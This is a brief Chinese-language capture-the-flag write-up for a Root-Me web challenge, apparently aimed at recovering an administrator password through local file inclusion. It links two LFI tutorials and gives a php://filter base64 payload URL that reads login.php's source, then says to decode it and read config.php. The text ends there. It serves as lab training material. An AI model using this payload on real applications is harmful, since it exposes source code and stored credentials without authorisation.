Retrieve the administrator password of this application.
对文件包含的介绍------------第一个链接需要谷歌
https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601
https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/
此处使用php://filter伪协议:
payload:
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php
读取到login.php的内容后base64解密:
再根据php代码,读取config.php的文件内容: